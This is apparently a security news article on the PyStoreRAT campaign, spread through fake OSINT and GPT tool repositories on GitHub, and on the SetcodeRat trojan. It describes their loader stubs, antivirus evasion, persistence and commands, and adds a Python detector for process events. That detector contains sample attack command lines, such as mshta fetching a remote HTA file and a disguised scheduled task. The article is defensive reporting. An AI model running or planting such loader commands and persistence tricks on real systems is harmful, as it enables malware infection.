Saturday, December 13, 2025

Fake OSINT and GPT Tool GitHub Repos Spread PyStoreRAT Malware Payloads

Cybersecurity researchers are calling attention to a new campaign that is leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT.

“These repositories, often themed as development utilities or OSINT tools, contain just a few lines of code responsible for silently downloading a remote HTA file and executing it via ‘mshta.exe,'” Morphisec researcher Yonatan Edri said in a report shared with The Hacker News.

PyStoreRAT has been described as a “modular, multi-stage” implant that can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also deploys an information stealer known as Rhadamanthys as a follow-on payload.

Attack chains involve distributing the malware via Python or JavaScript loader stubs embedded in GitHub repositories masquerading as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities that are designed to appeal to analysts and developers.

The earliest signs of the campaign date back to mid-June 2025, with a steady stream of “repositories” published since then. The tools are promoted via social media platforms like YouTube and X, as well as by artificially inflating the repositories’ star and fork metrics, a technique reminiscent of the Stargazers Ghost Network.


The threat actors behind the campaign use either newly created GitHub accounts or ones that lay dormant for months to publish the repositories, stealthily slipping the malicious payload in as “maintenance” commits in October and November, after the tools began to gain popularity and landed on GitHub’s top trending lists.

In fact, many of the tools did not function as advertised: some only displayed static menus or non-interactive interfaces, while others performed minimal placeholder operations. The intention behind the operation was to lend them a veneer of legitimacy by abusing GitHub’s inherent trust and deceiving users into executing the loader stub that is responsible for initiating the infection chain.

This effectively triggers the execution of a remote HTML Application (HTA) payload that, in turn, delivers the PyStoreRAT malware, which comes with capabilities to profile the system, check for administrator privileges, and scan the system for cryptocurrency wallet-related files, specifically those associated with Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.

The loader stub gathers a list of installed antivirus products and checks for strings matching “Falcon” (a reference to CrowdStrike Falcon) or “Reason” (a reference to Cybereason or ReasonLabs), likely in an attempt to reduce visibility. If either is detected, it launches “mshta.exe” by way of “cmd.exe.” Otherwise, it proceeds with direct “mshta.exe” execution.

Persistence is achieved by creating a scheduled task that is disguised as an NVIDIA app self-update. In the final stage, the malware contacts an external server to fetch commands to be executed on the host. Some of the supported commands are listed below:

  • Download and execute EXE payloads, including Rhadamanthys
  • Download and extract ZIP archives
  • Download a malicious DLL and execute it using “rundll32.exe”
  • Fetch raw JavaScript code and execute it dynamically in memory using eval()
  • Download and install MSI packages
  • Spawn a secondary “mshta.exe” process to load additional remote HTA payloads
  • Execute PowerShell commands directly in memory
  • Spread via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files
  • Delete the scheduled task to remove the forensic trail
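As an added illustration that is not part of the Morphisec report or this article, the following Python detector flags the loader-stub, second-stage and persistence behaviors described above in constructed, Sysmon-style process-creation events. The field names, rule names, task name and sample events are assumptions chosen for the example.

```python
import re

# Assumed, simplified Sysmon Event ID 1 shape: {"id", "parent", "image", "cmdline"}.
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "node.exe", "wscript.exe",
                "cscript.exe", "cmd.exe"}
PAYLOAD_RUNNERS = {"mshta.exe", "rundll32.exe", "powershell.exe", "msiexec.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
TASK_NAME_RE = re.compile(r'/tn\s+"?([^"\s]+)', re.IGNORECASE)
TASK_ACTION_RE = re.compile(r'/tr\s+"?([^"\s]+)', re.IGNORECASE)


def classify(ev):
    """Return the rule names a process-creation event matches (empty list if none)."""
    hits = []
    parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmdline"]
    # Loader stub: a script host (or cmd.exe, the AV-aware fallback path described
    # in the report) starts mshta.exe with a remote URL on the command line.
    if image == "mshta.exe" and parent in SCRIPT_HOSTS and URL_RE.search(cmd):
        hits.append("script_host_to_remote_mshta")
    # Second stage: mshta.exe spawning the runners the command set relies on
    # (rundll32 for DLLs, msiexec for MSI, PowerShell, or a secondary mshta).
    if parent == "mshta.exe" and image in PAYLOAD_RUNNERS:
        hits.append("mshta_spawns_payload_runner")
    # Persistence: a task whose name imitates an NVIDIA update but whose action
    # is a script host rather than a vendor binary (heuristic, an assumption).
    if image == "schtasks.exe" and "/create" in cmd.lower():
        name, action = TASK_NAME_RE.search(cmd), TASK_ACTION_RE.search(cmd)
        if name and "nvidia" in name.group(1).lower() and action and \
                action.group(1).lower().rsplit("\\", 1)[-1] in SCRIPT_HOSTS | {"mshta.exe"}:
            hits.append("fake_nvidia_update_task")
    return hits


def scan(events):
    """Map each flagged event id to the rules it matched."""
    return {ev["id"]: classify(ev) for ev in events if classify(ev)}


# Constructed sample telemetry (not real indicators): a benign install and a loader chain.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\u\Downloads\setup.msi"},
    {"id": 2, "parent": "python.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/stage.hta"},
    {"id": 3, "parent": "cmd.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/stage.hta"},
    {"id": 4, "parent": "mshta.exe", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\u\AppData\Local\Temp\m.dll,Run"},
    {"id": 5, "parent": "mshta.exe", "image": "schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn NvidiaAppUpdate /tr "C:\Windows\System32\mshta.exe" /sc minute'},
]

if __name__ == "__main__":
    for event_id, rules in scan(SAMPLE_EVENTS).items():
        print(event_id, rules)
```

Event 1 is the benign control; events 2 to 5 exercise the direct mshta path, the cmd.exe fallback, a DLL stage and the disguised task respectively.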

It is currently not known who is behind the operation, but the presence of Russian-language artifacts and coding patterns points to a threat actor of likely Eastern European origin, Morphisec said.

“PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats,” Edri concluded. “Its use of HTA/JS for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional EDR solutions detect only late in the infection chain.”


The disclosure comes as Chinese security vendor QiAnXin detailed another new remote access trojan (RAT) codenamed SetcodeRat that has likely been propagated across the country since October 2025 via malvertising lures. Hundreds of computers, including those belonging to governments and enterprises, are said to have been infected in the span of one month.

“The malicious installation package will first verify the region of the victim,” the QiAnXin Threat Intelligence Center said. “If it is not in the Chinese-speaking area, it will automatically exit.”

The malware is disguised as legitimate installers for popular programs like Google Chrome and proceeds to the next stage only if the system language corresponds to Mainland China (Zh-CN), Hong Kong (Zh-HK), Macao (Zh-MO), or Taiwan (Zh-TW). It also terminates execution if a connection to a Bilibili URL (“api.bilibili[.]com/x/report/click/now”) is unsuccessful.

In the next stage, an executable named “pnm2png.exe” is launched to sideload “zlib1.dll,” which then decrypts the contents of a file called “qt.conf” and runs it. The decrypted payload is a DLL that embeds the RAT payload. SetcodeRat can connect either to Telegram or to a conventional command-and-control (C2) server to retrieve instructions and carry out data theft.

This allows the malware to take screenshots, log keystrokes, read folders, set folders, start processes, run “cmd.exe,” set up socket connections, collect system and network connection information, and update itself to a new version.
